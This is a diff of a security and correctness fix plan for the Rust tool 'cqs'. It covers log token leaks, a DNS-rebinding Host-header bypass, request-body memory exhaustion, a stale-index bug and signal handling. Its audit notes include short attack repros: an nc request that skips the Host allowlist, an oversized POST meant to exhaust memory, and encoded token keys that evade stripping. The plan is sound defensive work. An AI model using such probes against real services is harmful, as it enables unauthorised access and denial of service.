-        .and_then(|m| m.get("content"))
-        .and_then(|v| v.as_str())
-        .map(|s| s.trim().to_string());
-    match content {
-        Some(s) if !s.is_empty() => Ok(Some(s)),
-        _ => Ok(None),
-    }
-}
-```
-
-### Replacement (body_preview, lines 490-500)
-
-```rust
-/// Read up to 2 KiB from an HTTP error response body for log context.
-/// Returns the empty string if the body can't be read or is non-UTF-8.
-/// Hard-capped to bound log spam and prevent OOM on hostile error bodies.
-fn body_preview(resp: reqwest::blocking::Response) -> String {
-    use std::io::Read;
-    const PREVIEW_CAP: u64 = 2 * 1024;
-    let mut buf = Vec::with_capacity(PREVIEW_CAP as usize);
-    if resp.take(PREVIEW_CAP).read_to_end(&mut buf).is_err() {
-        return String::new();
-    }
-    let body = String::from_utf8_lossy(&buf);
-    let cut = body
-        .char_indices()
-        .nth(256)
-        .map(|(i, _)| i)
-        .unwrap_or(body.len());
-    body[..cut].to_string()
-}
-```
-
-### Notes
-
-- `reqwest::blocking::Response` implements `Read`, and the builder's `.take(n)` method on a Read returns a length-capped adapter. The wrapping `take(cap as u64 + 1)` is so we can detect "exceeded cap" by reading 1 byte beyond and bailing.
-- Confirm `LlmError::Http(String)` variant signature; if it requires a typed inner (e.g. `LlmError::Http(reqwest::Error)`), introduce a sibling `LlmError::BodyTooLarge { got: usize, cap: usize }` instead.
-- Add tests per the audit's TC-ADV-1.30-1 (P2.26): `test_oversized_response_body_capped_at_max` and `test_4xx_with_large_body_does_not_buffer_entire_body` in `src/llm/local.rs::tests`.
-
----
-
-## P1.11 — Auth token leaked into TraceLayer span URI logging
-
-**Finding:** P1.11 in audit-triage.md / Security
-**Files:** `src/serve/mod.rs:195` (`TraceLayer::new_for_http()`), interacts with `src/serve/auth.rs:194-232`
-**Why:** `TraceLayer::new_for_http()` records `http.uri` (full path + query string) on every span. The first browser navigation `GET /?token=<43 chars>` lands the token in the span at DEBUG. Anyone with `RUST_LOG=tower_http=debug` or running under journald sees the token persisted.
-
-### Current code (src/serve/mod.rs:189-196)
-
-```rust
-        // OB-V1.29-5: TraceLayer emits a span per request plus
-        // on-response events with latency + status. Handlers already
-        // log entry via `tracing::info!`; this layer closes the loop
-        // by logging completion, giving per-endpoint latency in the
-        // journal without hand-wrapping every handler body.
-        .layer(TraceLayer::new_for_http())
-}
-```
-
-### Replacement
-
-```rust
-        // OB-V1.29-5: TraceLayer emits a span per request plus
-        // on-response events with latency + status. Handlers already
-        // log entry via `tracing::info!`; this layer closes the loop
-        // by logging completion, giving per-endpoint latency in the
-        // journal without hand-wrapping every handler body.
-        //
-        // SEC: customise MakeSpan to record path only, NOT the full URI —
-        // the `?token=…` query param lands in span fields otherwise and
-        // bleeds the per-launch token into journald / RUST_LOG=debug.
-        .layer(
-            TraceLayer::new_for_http().make_span_with(|req: &axum::extract::Request| {
-                tracing::info_span!(
-                    "http_request",
-                    method = %req.method(),
-                    path = %req.uri().path(),
-                )
-            }),
-        )
-}
-```
-
-### Notes
-
-- The closure drops `query` and `version` fields; if downstream tooling depends on `http.version`, add `version = ?req.version()` (avoid `%` Display because some HTTP version reps may differ across deps).
-- `Request` import: `use axum::extract::Request;` — already imported at top of file (line 25).
-- Add a regression test in `src/serve/tests.rs::auth_tests` that asserts `?token=…` does not appear in any captured tracing event.
-
----
-
-## P1.12 — enforce_host_allowlist passes through missing Host header — DNS-rebinding bypass
-
-**Finding:** P1.12 in audit-triage.md / Security + Platform
-**Files:** `src/serve/mod.rs:234-251`
-**Why:** Doc-comment justifies missing-Host pass-through as "test ergonomic". HTTP/1.0 doesn't require Host; `nc 127.0.0.1 8080` with `GET /api/chunk/<id> HTTP/1.0\r\n\r\n` reaches the handler with zero allowlist check. Test ergonomics privileged over runtime safety.
-
-### Current code (src/serve/mod.rs:230-251)
-
-```rust
-/// A missing `Host:` header passes through — HTTP/1.1 requires one and
-/// hyper always provides one on real traffic, but unit tests built via
-/// `Request::builder()` without a `.uri()` that includes a host don't
-/// get one synthesized, and we'd rather not break that ergonomic.
-async fn enforce_host_allowlist(
-    State(allowed): State<AllowedHosts>,
-    req: Request,
-    next: Next,
-) -> Result<Response, (StatusCode, &'static str)> {
-    match req.headers().get(header::HOST) {
-        None => Ok(next.run(req).await),
-        Some(value) => {
-            let host = value.to_str().unwrap_or("");
-            if allowed.contains(host) {
-                Ok(next.run(req).await)
-            } else {
-                tracing::warn!(host = %host, "serve: rejected request with disallowed Host header");
-                Err((StatusCode::BAD_REQUEST, "disallowed Host header"))
-            }
+    if !cfg.quiet {
+        println!("\n{} file(s) changed, reindexing...", files.len());
+        for f in &files {
+            println!("  {}", f.display());
         }
     }
-}
-```
 
-### Replacement
-
-```rust
-/// Reject requests with no `Host:` header. HTTP/1.1 requires one; HTTP/1.0
-/// does not, but a no-Host request bypasses DNS-rebinding protection so
-/// we treat it as malformed. Tests must build requests with a Host header
-/// (see `src/serve/tests.rs` fixtures).
-async fn enforce_host_allowlist(
-    State(allowed): State<AllowedHosts>,
-    req: Request,
-    next: Next,
-) -> Result<Response, (StatusCode, &'static str)> {
-    match req.headers().get(header::HOST) {
-        None => {
-            tracing::warn!("serve: rejected request with missing Host header");
-            Err((StatusCode::BAD_REQUEST, "missing Host header"))
-        }
-        Some(value) => {
-            let host = value.to_str().unwrap_or("");
-            if allowed.contains(host) {
-                Ok(next.run(req).await)
-            } else {
-                tracing::warn!(host = %host, "serve: rejected request with disallowed Host header");
-                Err((StatusCode::BAD_REQUEST, "disallowed Host header"))
-            }
-        }
-    }
-}
-```
-
-### Notes
-
-- Existing tests in `src/serve/tests.rs` that use `Request::builder().uri("/foo")` must add `.header(header::HOST, "127.0.0.1:8080")` (or `localhost`) to the builder. Sweep needed:
-  - `grep -n 'Request::builder()' src/serve/tests.rs` and add Host headers to fixtures.
-- Add a positive test `test_missing_host_header_rejected` that builds a request without Host and asserts 400.
-
----
-
-## P1.13 — Auth token printed to stdout — captured by journald for 30-day retention
-
-**Finding:** P1.13 in audit-triage.md / Security
-**Files:** `src/serve/mod.rs:111-117`
-**Why:** Banner `println!("cqs serve listening on http://{actual}/?token={token}")` writes to stdout. Under systemd `StandardOutput=journal` (default) or container log drivers, the token persists into a 30-day-retention store the user doesn't think about. Token doesn't rotate during a long-lived launch.
-
-### Current code (src/serve/mod.rs:105-128)
-
-```rust
-        if !quiet {
-            // #1096: when auth is enabled, emit the paste-ready URL
-            // (token + bind addr) so a fresh launch is one click away
-            // from being usable. The token appears here once and is
-            // never logged via tracing — auditors can grep for serve
-            // banners separately from the structured log stream.
-            match auth.as_ref() {
-                Some(token) => {
-                    println!(
-                        "cqs serve listening on http://{actual}/?token={}",
-                        token.as_str()
-                    );
-                }
-                None => {
-                    println!("cqs serve listening on http://{actual}");
-                    eprintln!(
-                        "WARN: --no-auth in use — anyone with network access to {actual} \
-                         can read this index"
-                    );
-                }
-            }
-            println!("press Ctrl-C to stop");
-        }
-        tracing::info!(addr = %actual, auth_enabled = auth.is_some(), "cqs serve started");
-```
-
-### Replacement
-
-```rust
-        if !quiet {
-            // #1096: when auth is enabled, emit the paste-ready URL
-            // (token + bind addr) so a fresh launch is one click away
-            // from being usable. The token appears here once and is
-            // never logged via tracing — auditors can grep for serve
-            // banners separately from the structured log stream.
-            //
-            // SEC: route the token-bearing banner to STDERR when stdout
-            // is not a TTY. systemd `StandardOutput=journal` and container
-            // log drivers persist stdout into a 30-day retention store —
-            // stderr is similarly captured but is the conventional place
-            // for "informational interactive output" and operators can
-            // redirect it (`2>/dev/null`) without losing structured logs.
-            // For a stronger guarantee, set `--no-banner` (TODO).
-            let stdout_is_tty = std::io::IsTerminal::is_terminal(&std::io::stdout());
-            match auth.as_ref() {
-                Some(token) => {
-                    let line = format!(
-                        "cqs serve listening on http://{actual}/?token={}",
-                        token.as_str()
-                    );
-                    if stdout_is_tty {
-                        println!("{line}");
-                    } else {
-                        eprintln!("{line}");
-                        eprintln!(
-                            "(stdout is not a TTY; token-bearing banner routed to stderr to avoid \
-                             persisting into journald/container logs)"
-                        );
-                    }
-                }
-                None => {
-                    println!("cqs serve listening on http://{actual}");
-                    eprintln!(
-                        "WARN: --no-auth in use — anyone with network access to {actual} \
-                         can read this index"
-                    );
-                }
-            }
-            println!("press Ctrl-C to stop");
-        }
-        tracing::info!(addr = %actual, auth_enabled = auth.is_some(), "cqs serve started");
-```
-
-### Notes
-
-- `std::io::IsTerminal` stable since 1.70. MSRV is 1.95, fine.
-- Stretch (out of scope here): Jupyter-style `--no-banner` flag that writes the URL to a `0o600` file in `$XDG_RUNTIME_DIR` instead. Tracking-issue material.
-- Update CHANGELOG: "`cqs serve` no longer prints the auth-bearing URL to stdout when stdout is non-interactive (systemd / container) — banner routes to stderr instead. Set `--no-auth` if banner suppression is required."
-
----
-
-## P1.14 — cqs serve has no RequestBodyLimitLayer — authenticated client can OOM via large POST
-
-**Finding:** P1.14 in audit-triage.md / Security
-**Files:** `src/serve/mod.rs:154-196` (`build_router`)
-**Why:** All routes are `GET`, but axum buffers the request body before dispatching. No `RequestBodyLimitLayer` means an authenticated client can `POST /api/stats` with `Content-Length: 99999999999` and OOM the daemon before the 405.
-
-### Current code (src/serve/mod.rs:158-196)
-
-```rust
-    let mut app = Router::new()
-        .route("/health", get(handlers::health))
-        .route("/api/stats", get(handlers::stats))
-        // ... routes ...
-        .with_state(state);
-
-    if let Some(token) = auth {
-        app = app.layer(from_fn_with_state(token, auth::enforce_auth));
-    }
-
-    app
-        .layer(from_fn_with_state(allowed_hosts, enforce_host_allowlist))
-        .layer(CompressionLayer::new())
-        .layer(TraceLayer::new_for_http())
-}
-```
-
-### Replacement
-
-```rust
-    let mut app = Router::new()
-        .route("/health", get(handlers::health))
-        .route("/api/stats", get(handlers::stats))
-        // ... routes unchanged ...
-        .with_state(state);
-
-    if let Some(token) = auth {
-        app = app.layer(from_fn_with_state(token, auth::enforce_auth));
-    }
-
-    app
-        .layer(from_fn_with_state(allowed_hosts, enforce_host_allowlist))
-        // SEC: cap request bodies. Every route is GET; legitimate clients
-        // never send a body. 64 KiB is plenty for query strings and cookies
-        // (which travel in headers, not body); axum still rejects bodies
-        // larger than this with 413 Payload Too Large before allocating.
-        .layer(tower_http::limit::RequestBodyLimitLayer::new(64 * 1024))
-        .layer(CompressionLayer::new())
-        // ... TraceLayer + MakeSpan customisation per P1.11 ...
-}
-```
-
-### Notes
-
-- `tower_http::limit::RequestBodyLimitLayer` is already in the dep tree (`tower_http` is imported at the top of `serve/mod.rs`); no Cargo.toml change. Verify with `cargo tree -p tower-http -e features 2>&1 | grep limit` — if not enabled, add `"limit"` to the `tower-http` feature list in `Cargo.toml`.
-- Layer order matters: this sits *outside* auth/host-allowlist (so the limit applies even to rejected requests, preventing OOM-then-401 attacks) but *inside* compression so the 413 response is still gzipped.
-
----
-
-## P1.15 — UMAP coords not invalidated on chunk content change — cluster view serves stale
-
-**Finding:** P1.15 in audit-triage.md / Data Safety
-**Files:** `src/store/chunks/async_helpers.rs:339-362` (UPSERT)
-**Why:** v22 added `umap_x`/`umap_y` columns; `cqs index --umap` writes them. The chunk UPSERT refreshes embedding/embedding_base/etc. on content_hash mismatch but does NOT touch UMAP coords. Cluster view then displays the chunk at a position computed from the old embedding.
-
-### Current code (src/store/chunks/async_helpers.rs:339-362)
-
-```rust
-        qb.push(
-            " ON CONFLICT(id) DO UPDATE SET \
-             origin=excluded.origin, \
-             source_type=excluded.source_type, \
-             language=excluded.language, \
-             chunk_type=excluded.chunk_type, \
-             name=excluded.name, \
-             signature=excluded.signature, \
-             content=excluded.content, \
-             content_hash=excluded.content_hash, \
-             doc=excluded.doc, \
-             line_start=excluded.line_start, \
-             line_end=excluded.line_end, \
-             embedding=excluded.embedding, \
-             embedding_base=excluded.embedding_base, \
-             source_mtime=excluded.source_mtime, \
-             updated_at=excluded.updated_at, \
-             parent_id=excluded.parent_id, \
-             window_idx=excluded.window_idx, \
-             parent_type_name=excluded.parent_type_name, \
-             parser_version=excluded.parser_version \
-             WHERE chunks.content_hash != excluded.content_hash \
-                OR chunks.parser_version != excluded.parser_version",
-        );
-```
-
-### Replacement
-
-Add `umap_x = NULL, umap_y = NULL` so the cluster view's `IS NOT NULL` filter correctly reports "needs reprojection". The CASE clause restricts the NULL-out to the content-changed branch — pure parser_version bumps don't invalidate UMAP because the embedding hasn't changed.
-
-```rust
-        qb.push(
-            " ON CONFLICT(id) DO UPDATE SET \
-             origin=excluded.origin, \
-             source_type=excluded.source_type, \
-             language=excluded.language, \
-             chunk_type=excluded.chunk_type, \
-             name=excluded.name, \
-             signature=excluded.signature, \
-             content=excluded.content, \
-             content_hash=excluded.content_hash, \
-             doc=excluded.doc, \
-             line_start=excluded.line_start, \
-             line_end=excluded.line_end, \
-             embedding=excluded.embedding, \
-             embedding_base=excluded.embedding_base, \
-             source_mtime=excluded.source_mtime, \
-             updated_at=excluded.updated_at, \
-             parent_id=excluded.parent_id, \
-             window_idx=excluded.window_idx, \
-             parent_type_name=excluded.parent_type_name, \
-             parser_version=excluded.parser_version, \
-             umap_x=CASE WHEN chunks.content_hash != excluded.content_hash \
-                         THEN NULL ELSE chunks.umap_x END, \
-             umap_y=CASE WHEN chunks.content_hash != excluded.content_hash \
-                         THEN NULL ELSE chunks.umap_y END \
-             WHERE chunks.content_hash != excluded.content_hash \
-                OR chunks.parser_version != excluded.parser_version",
-        );
-```
-
-### Notes
-
-- Add a regression test in `src/store/chunks/` (or wherever upsert tests live) that:
-  1. Inserts a chunk with `umap_x=Some(1.0), umap_y=Some(2.0)` (write via `update_umap_coords_batch`).
-  2. UPSERTs the same chunk with new content (different `content_hash`).
-  3. Asserts `umap_x IS NULL AND umap_y IS NULL`.
-- Stretch (out of scope): metadata `umap_generation` counter to surface "needs reprojection" warnings in `cqs serve`. Tracking-issue material.
-
----
-
-## P1.16 — --name-boost CLI: defensive clamp at consumer (CLI parser already fixed)
-
-**Finding:** P1.16 in audit-triage.md / Algorithm
-**Files:** `src/cli/args.rs:62` (already uses `parse_unit_f32`), `src/search/scoring/candidate.rs:283-289`
-**Why:** **LINE DRIFT:** the audit text claims CLI uses `parse_finite_f32`. Verified at `src/cli/args.rs:62`: `value_parser = parse_unit_f32` (clap-bounded `[0.0, 1.0]` per `src/cli/definitions.rs:137-143`). CLI side is already fixed. The remaining defense-in-depth concern: the consumer in `apply_scoring_pipeline` does not clamp, so if `name_boost` ever flows from a path that bypasses `parse_unit_f32` (programmatic library usage, future config-file path that skips `clamp_config_f32`, deserialization), the multiplication still sign-flips.
-
-### Current code (src/search/scoring/candidate.rs:277-289)
-
-```rust
-pub(crate) fn apply_scoring_pipeline(
-    embedding_score: f32,
-    name: Option<&str>,
-    file_part: &str,
-    ctx: &ScoringContext<'_>,
-) -> Option<f32> {
-    let base_score = if let Some(matcher) = ctx.name_matcher {
-        let n = name.unwrap_or("");
-        let name_score = matcher.score(n);
-        (1.0 - ctx.filter.name_boost) * embedding_score + ctx.filter.name_boost * name_score
-    } else {
-        embedding_score
+    let emb = match try_init_embedder(cfg.embedder, &mut state.embedder_backoff, cfg.model_config) {
+        Some(e) => e,
+        None => return,
     };
 ```
 
 ### Replacement
 
 ```rust
-pub(crate) fn apply_scoring_pipeline(
-    embedding_score: f32,
-    name: Option<&str>,
-    file_part: &str,
-    ctx: &ScoringContext<'_>,
-) -> Option<f32> {
-    // Defense-in-depth: clamp name_boost into [0.0, 1.0] regardless of where
-    // it originated. CLI uses parse_unit_f32 (clap-bounded) and config uses
-    // clamp_config_f32, but a future programmatic / deserialised path could
-    // bypass both, in which case `(1.0 - 5.0) * embedding` would sign-flip
-    // search results silently. Cheap insurance.
-    let name_boost = ctx.filter.name_boost.clamp(0.0, 1.0);
-    let base_score = if let Some(matcher) = ctx.name_matcher {
-        let n = name.unwrap_or("");
-        let name_score = matcher.score(n);
-        (1.0 - name_boost) * embedding_score + name_boost * name_score
-    } else {
-        embedding_score
+pub(super) fn process_file_changes(cfg: &WatchConfig, store: &Store, state: &mut WatchState) {
+    let files: Vec<PathBuf> = state.pending_files.drain().collect();
+    let _span = info_span!("process_file_changes", file_count = files.len()).entered();
+    state.pending_files.shrink_to(64);
+
+    // CQ-V1.30.1-1 / AC-V1.30.1-4 / DS-V1.30.1-D8: warn at the top so
+    // operators see the count, but DO NOT reset the counter here — the
+    // outer loop's `publish_watch_snapshot` runs after this function
+    // returns, and `WatchSnapshot::compute` uses `dropped_this_cycle > 0`
+    // as a Stale signal. If we zero it before the embedder check below
+    // (which may early-return on init failure), the snapshot reports
+    // `Fresh` even though events were dropped and never reindexed —
+    // defeating `cqs eval --require-fresh`. Reset only after a
+    // successful drain so the next cycle's snapshot reflects the
+    // truthful state.
+    if state.dropped_this_cycle > 0 {
+        tracing::warn!(
+            dropped = state.dropped_this_cycle,
+            cap = max_pending_files(),
+            "Watch event queue full this cycle; dropping events. Run `cqs index` to catch up"
+        );
+    }
+    if !cfg.quiet {
+        println!("\n{} file(s) changed, reindexing...", files.len());
+        for f in &files {
+            println!("  {}", f.display());
+        }
+    }
+
+    let emb = match try_init_embedder(cfg.embedder, &mut state.embedder_backoff, cfg.model_config) {
+        Some(e) => e,
+        None => return,
     };
 ```
 
-### Notes
+Then, after the successful `reindex_files` `Ok(...)` arm completes (around line 195, inside the `Ok((count, content_hashes)) =>` block — see existing code at events.rs:195+), add the reset:
 
-- LINE DRIFT noted: searched for `parse_finite_f32` on `name_boost`, found `parse_unit_f32` at `src/cli/args.rs:62`. Audit text was stale; CLI parser fix already shipped (per audit `AC-V1.29-5`). Only the consumer-side defensive clamp remains.
-- Add a test `test_apply_scoring_pipeline_clamps_out_of_range_name_boost` in `src/search/scoring/candidate.rs::tests` that constructs a `ScoringContext` with `name_boost = 5.0` and asserts the embedding signal is not negated.
+```rust
+        Ok((count, content_hashes)) => {
+            // Record mtimes to skip duplicate events
+            for (file, mtime) in pre_mtimes {
+                state.last_indexed_mtime.insert(file, mtime);
+            }
+            // CQ-V1.30.1-1 / AC-V1.30.1-4: reset only after a successful
+            // drain. The dropped events surfaced in the warn above are
+            // also queued for reconcile (Layer 2) on the next idle pass,
+            // so the count stays meaningful exactly until the reconcile
+            // refills `pending_files` with the same paths.
+            state.dropped_this_cycle = 0;
+            // ... (existing body continues: prune_last_indexed_mtime, splade encoding, HNSW maintenance)
+```
+
+### Verification
+
+- `cargo build --features cuda-index`
+- `cargo test --features cuda-index --lib watch::events`
+- Add a regression test (in `src/cli/watch/tests.rs` or `events.rs` `#[cfg(test)]` block) that:
+  - Seeds `state.dropped_this_cycle = 5` and `state.pending_files` with one path
+  - Calls `process_file_changes` against a fixture with no embedder available (so the early-return path fires)
+  - Asserts `state.dropped_this_cycle == 5` after the call (NOT zeroed)
+- Manual: `cqs status --watch-fresh --json` after a 200-file save burst that exceeds `CQS_WATCH_MAX_PENDING=10` — must report `state: "stale"` until reconcile drains.
 
 ---
 
-## P1.17 — drain_pending_rebuild dedup drops fresh embeddings during rebuild window
+## P1.3: CQ-V1.30.1-4 + AC-V1.30.1-5 — auth ladder leaks `?token=` via cookie-wins-first + case-sensitive parser
 
-**Finding:** P1.17 in audit-triage.md / Algorithm
-**Files:** `src/cli/watch.rs:1077-1105`
-**Why:** Non-blocking HNSW rebuild (#1113) snapshots `(id, embedding)` from a read-only Store, while the watch loop captures fresh `(id, embedding)` pairs into `pending.delta`. On swap, dedup is by id — if a chunk was re-embedded mid-rebuild (file edit), its fresh embedding lands in delta but `known` already contains the id with the OLD embedding from the snapshot. The filter drops the fresh embedding; HNSW carries stale vector until next threshold rebuild.
+**Files:** `src/serve/auth.rs:243-321`, `src/serve/auth.rs:572-600` (tests to invert)
+**Effort:** ~25 minutes
+**Why:** Two cooperating bugs in the SEC-7 token-redirect path:
 
-### Current code (src/cli/watch.rs:1077-1105)
+1. (AC-V1.30.1-5) `check_request` checks Bearer → cookie → query in that order. A request with both a valid cookie *and* `?token=<…>` returns `AuthOutcome::Ok` (not `OkViaQueryParam`), so the redirect at line 360 never fires — the token sits in the URL bar permanently after a bookmarked-URL reload.
+2. (CQ-V1.30.1-4) `strip_token_param` and `check_request` do byte-literal `starts_with("token=")` matches; `?Token=<token>` (capital `T`) and `?%74oken=<token>` (percent-encoded) are not recognised, so the redirect path never strips them either. The current tests at line 572-600 *pin the bug* with comments calling out the SEC-7 leakage.
+
+Single fix: lowercase + percent-decode the parameter key once during the URI walk, AND treat presence of `?token=…` as redirect-eligible regardless of which channel matched (sniff after Ok). Then invert the two pinned tests.
+
+### Current code (the parsing helpers)
 
 ```rust
-    match outcome {
-        Ok(Some(mut new_index)) => {
-            // Replay captured delta — but skip ids the rebuild thread already
-            // saw via its store snapshot, so we don't double-insert. (hnsw_rs
-            // has no dedup; duplicate ids would create twin vectors that bloat
-            // the graph until the next threshold cleans them up.)
-            let known: std::collections::HashSet<&str> =
-                new_index.ids().iter().map(String::as_str).collect();
-            let to_replay: Vec<(String, Embedding)> = pending
-                .delta
-                .into_iter()
-                .filter(|(id, _)| !known.contains(id.as_str()))
-                .collect();
-            drop(known);
-            if !to_replay.is_empty() {
-                let items: Vec<(String, &[f32])> = to_replay
-                    .iter()
-                    .map(|(id, emb)| (id.clone(), emb.as_slice()))
-                    .collect();
-                match new_index.insert_batch(&items) {
-                    Ok(n) => {
-                        tracing::info!(replayed = n, "Replayed delta into rebuilt HNSW before swap")
-                    }
-                    Err(e) => tracing::warn!(
-                        error = %e,
-                        replayed_attempt = items.len(),
-                        "Failed to replay delta into rebuilt HNSW; new chunks will surface on next rebuild"
-                    ),
-                }
-            }
-```
-
-### Replacement
-
-The dedup must compare by content fidelity, not just by id. Options:
-1. **Cheapest, correct:** Replay every delta entry unconditionally; on duplicate id, *replace* the snapshot vector. `hnsw_rs` has no replace, so use a "remove then insert" path.
-2. **Cheapest, accept stale:** Always insert delta; tolerate duplicate twin vectors until next rebuild (the audit explicitly flags this as a graph-size regression).
-3. **Correct, more invasive:** Capture `content_hash` alongside the snapshot, replay only when the delta entry's hash differs.
-
-Pick option 3 for correctness. `pending.delta` becomes `Vec<(String, Embedding, ContentHash)>`, the rebuild thread returns `Vec<(String, ContentHash)>` alongside the index, and the dedup filter checks the hash.
-
-This is **>30 lines of change** spanning `pending` struct definition, the rebuild thread, and the drain — see Notes for the full API change.
-
-### Notes
-
-- **STRUCTURAL CHANGE — exceeds 30-line replacement budget.** API change required:
-  - `PendingRebuild::delta: Vec<(String, Embedding)>` → `Vec<(String, Embedding, [u8; 32])>` (or `Vec<(String, Embedding, blake3::Hash)>`).
-  - `spawn_hnsw_rebuild` closure (`src/cli/watch.rs:980-1030`) returns `RebuildOutcome` — extend with `snapshot_hashes: Vec<(String, [u8; 32])>` so the drain can dedup by `(id, hash)`.
-  - Capture-site: wherever `pending.delta.push(...)` is called (search `pending.delta.push` and the watch reindex path). Each push must include the chunk's `content_hash`.
-  - Drain-site replacement (lines 1077-1105):
-    ```rust
-    let known: std::collections::HashMap<&str, &[u8; 32]> =
-        snapshot_hashes.iter().map(|(id, h)| (id.as_str(), h)).collect();
-    let to_replay: Vec<(String, Embedding)> = pending
-        .delta
-        .into_iter()
-        .filter(|(id, _, hash)| {
-            // Replay if id is unknown OR if the snapshot's vector was built
-            // from an older content_hash — fresh embedding wins.
-            known.get(id.as_str()).is_none_or(|sh| sh != &hash)
-        })
-        .map(|(id, emb, _hash)| (id, emb))
+//   src/serve/auth.rs:243-321
+/// Strip the `token` parameter from the URI's query string for the
+/// post-auth redirect. Other query params are preserved in their
+/// original order.
+fn strip_token_param(uri: &Uri) -> String {
+    let path = uri.path();
+    let Some(query) = uri.query() else {
+        return path.to_string();
+    };
+    let kept: Vec<&str> = query
+        .split('&')
+        .filter(|pair| !pair.starts_with("token=") && *pair != "token")
         .collect();
-    ```
-- Add a regression test `test_rebuild_window_re_embedding_replays_fresh_vector` in `src/cli/watch.rs::tests` that:
-  1. Spawns a rebuild with snapshot `[("a", emb_v1, hash_v1)]`.
-  2. Mid-rebuild, pushes `("a", emb_v2, hash_v2)` to `pending.delta`.
-  3. After drain, asserts the swapped HNSW contains `emb_v2`, not `emb_v1`.
-- This finding overlaps with P2.29 (TC-ADV: Non-blocking HNSW rebuild — no panic/dim-drift/store-fail tests). Coordinate the fix with the rebuild test suite.
-
----
-
-## P1.18 — token_pack break-on-first-oversized — drops smaller items that would fit
-
-**Finding:** P1.18 in audit-triage.md / Algorithm
-**Files:** `src/cli/commands/mod.rs:398-417`
-**Why:** Greedy knapsack: `if used + tokens > budget && kept_any { break; }`. Once one item fails to fit, every lower-scored item is dropped — even items that fit comfortably. Repro: budget=300, items `[A=250, B=100, C=40]`. After A packs (used=250), B fails (350>300) → break → C silently dropped though `used+40=290 ≤ 300`.
-
-### Current code (src/cli/commands/mod.rs:394-422)
-
-```rust
-    // Greedy pack in score order, tracking which indices to keep
-    let mut used: usize = 0;
-    let mut kept_any = false;
-    let mut keep: Vec<bool> = vec![false; items.len()];
-    for idx in order {
-        let tokens = token_counts[idx] + json_overhead_per_item;
-        if used + tokens > budget && kept_any {
-            break;
-        }
-        if !kept_any && tokens > budget {
-            // Always include at least one result, but cap at 10x budget to avoid
-            // pathological cases (e.g., 50K-token item with 300-token budget).
-            // When budget == 0, skip the 10x guard (0 * 10 == 0, which would reject
-            // every item) and include the first item unconditionally.
-            if budget > 0 && tokens > budget * 10 {
-                tracing::debug!(tokens, budget, "First item exceeds 10x budget, skipping");
-                continue;
-            }
-            tracing::debug!(
-                tokens,
-                budget,
-                "First item exceeds token budget, including anyway"
-            );
-        }
-        used += tokens;
-        keep[idx] = true;
-        kept_any = true;
-    }
-```
-
-### Replacement
-
-```rust
-    // Greedy pack in score order, tracking which indices to keep.
-    //
-    // Note: when an oversized item appears mid-stream we `continue` rather
-    // than `break` so subsequent (smaller, lower-scored) items can still
-    // fit into the remaining budget. Score-ordered packing already prefers
-    // higher-relevance items; the greedy fall-through is the right rounding
-    // when one mid-list item won't fit.
-    let mut used: usize = 0;
-    let mut kept_any = false;
-    let mut keep: Vec<bool> = vec![false; items.len()];
-    for idx in order {
-        let tokens = token_counts[idx] + json_overhead_per_item;
-        if used + tokens > budget && kept_any {
-            // Skip this oversized item but keep probing — smaller items
-            // later in score order may still fit.
-            continue;
-        }
-        if !kept_any && tokens > budget {
-            // Always include at least one result, but cap at 10x budget to avoid
-            // pathological cases (e.g., 50K-token item with 300-token budget).
-            // When budget == 0, skip the 10x guard (0 * 10 == 0, which would reject
-            // every item) and include the first item unconditionally.
-            if budget > 0 && tokens > budget * 10 {
-                tracing::debug!(tokens, budget, "First item exceeds 10x budget, skipping");
-                continue;
-            }
-            tracing::debug!(
-                tokens,
-                budget,
-                "First item exceeds token budget, including anyway"
-            );
-        }
-        used += tokens;
-        keep[idx] = true;
-        kept_any = true;
-    }
-```
-
-### Notes
-
-- Single-token change: `break` → `continue`.
-- Add a regression test in `src/cli/commands/mod.rs::tests`:
-  ```rust
-  #[test]
-  fn token_pack_continues_past_oversized_midstream_item() {
-      // items in score order: oversized, fits, fits
-      let items = vec![/* score=1.0 250-token, score=0.9 100-token, score=0.8 40-token */];
-      let token_counts = vec![250, 100, 40];
-      let (kept, used) = token_pack(&items, &token_counts, /* budget */ 300, /* json_overhead */ 0, /* score_fn */ ...);
-      assert_eq!(kept.len(), 2);  // A + C, B skipped
-      assert_eq!(used, 290);
-  }
-  ```
-
----
-
-## P1.19 — cqs serve shutdown handles only Ctrl-C — SIGTERM (systemctl) skips graceful drain
-
-**Finding:** P1.19 in audit-triage.md / Platform Behavior
-**Files:** `src/serve/mod.rs:253-260`
-**Why:** `shutdown_signal()` awaits only `tokio::signal::ctrl_c()`. Under systemd or any supervisor that issues `SIGTERM` (default for `systemctl stop`), axum never sees the signal and gets `SIGKILL`'d. macOS `launchd` also sends SIGTERM by default.
-
-### Current code (src/serve/mod.rs:253-260)
-
-```rust
-/// Listen for Ctrl-C to trigger axum's graceful shutdown.
-async fn shutdown_signal() {
-    if let Err(e) = tokio::signal::ctrl_c().await {
-        tracing::warn!(error = %e, "failed to install ctrl-c handler; server will only stop on listener failure");
-        std::future::pending::<()>().await;
-    }
-    tracing::info!("ctrl-c received, beginning graceful shutdown");
-}
-```
-
-### Replacement
-
-```rust
-/// Listen for Ctrl-C, SIGTERM (Unix), or Ctrl-Break/Ctrl-Close (Windows) to
-/// trigger axum's graceful shutdown. Without SIGTERM handling, `systemctl stop`
-/// and `launchd` shutdowns escalate to SIGKILL with no graceful drain.
-async fn shutdown_signal() {
-    let ctrl_c = async {
-        if let Err(e) = tokio::signal::ctrl_c().await {
-            tracing::warn!(error = %e, "failed to install ctrl-c handler");
-            std::future::pending::<()>().await;
-        }
-    };
-
-    #[cfg(unix)]
-    let terminate = async {
-        match tokio::signal::unix::signal(tokio::signal::unix::SignalKind::terminate()) {
-            Ok(mut s) => {
-                s.recv().await;
-            }
-            Err(e) => {
-                tracing::warn!(error = %e, "failed to install SIGTERM handler");
-                std::future::pending::<()>().await;
-            }
-        }
-    };
-
-    #[cfg(not(unix))]
-    let terminate = std::future::pending::<()>();
-
-    tokio::select! {
-        _ = ctrl_c => tracing::info!("ctrl-c received, beginning graceful shutdown"),
-        _ = terminate => tracing::info!("SIGTERM received, beginning graceful shutdown"),
-    }
-}
-```
-
-### Notes
-
-- `tokio::signal::unix::signal` is available with the `signal` feature on tokio. Verify Cargo.toml has `tokio = { ..., features = [..., "signal"] }` — likely already enabled for ctrl_c.
-- Stretch: also handle `SignalKind::interrupt()` and Windows `ctrl_break()`/`ctrl_close()`. Skipping for the easy P1 fix; SIGTERM is the high-impact case.
-- Companion finding in `src/cli/watch.rs:132-148` already installs a SIGTERM handler via `libc::signal` for the daemon — this fix brings serve to parity.
-
----
-
